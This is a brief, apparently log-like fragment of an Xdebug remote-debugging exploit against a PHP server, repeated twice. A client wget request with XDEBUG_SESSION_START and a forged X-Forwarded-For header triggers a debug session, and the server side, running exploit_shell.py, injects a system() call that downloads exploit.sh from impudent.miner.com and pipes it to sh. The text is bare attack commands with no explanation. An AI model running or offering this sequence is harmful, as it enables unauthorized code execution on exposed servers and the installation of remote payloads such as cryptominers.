Client:
wget -q -O - 192.168.1.160/1.php?XDEBUG_SESSION_START=phpstorm --header 'X-Forwarded-For: 192.168.1.160'
Server:
./exploit_shell.py
system("wget -q -O - http://impudent.miner.com:8080/exploit.sh | sh");
Client:
wget -q -O - 192.168.1.160/1.php?XDEBUG_SESSION_START=phpstorm --header 'X-Forwarded-For: 192.168.1.160'
Server:
./exploit_shell.py
system("wget -q -O - http://impudent.miner.com:8080/exploit.sh | sh");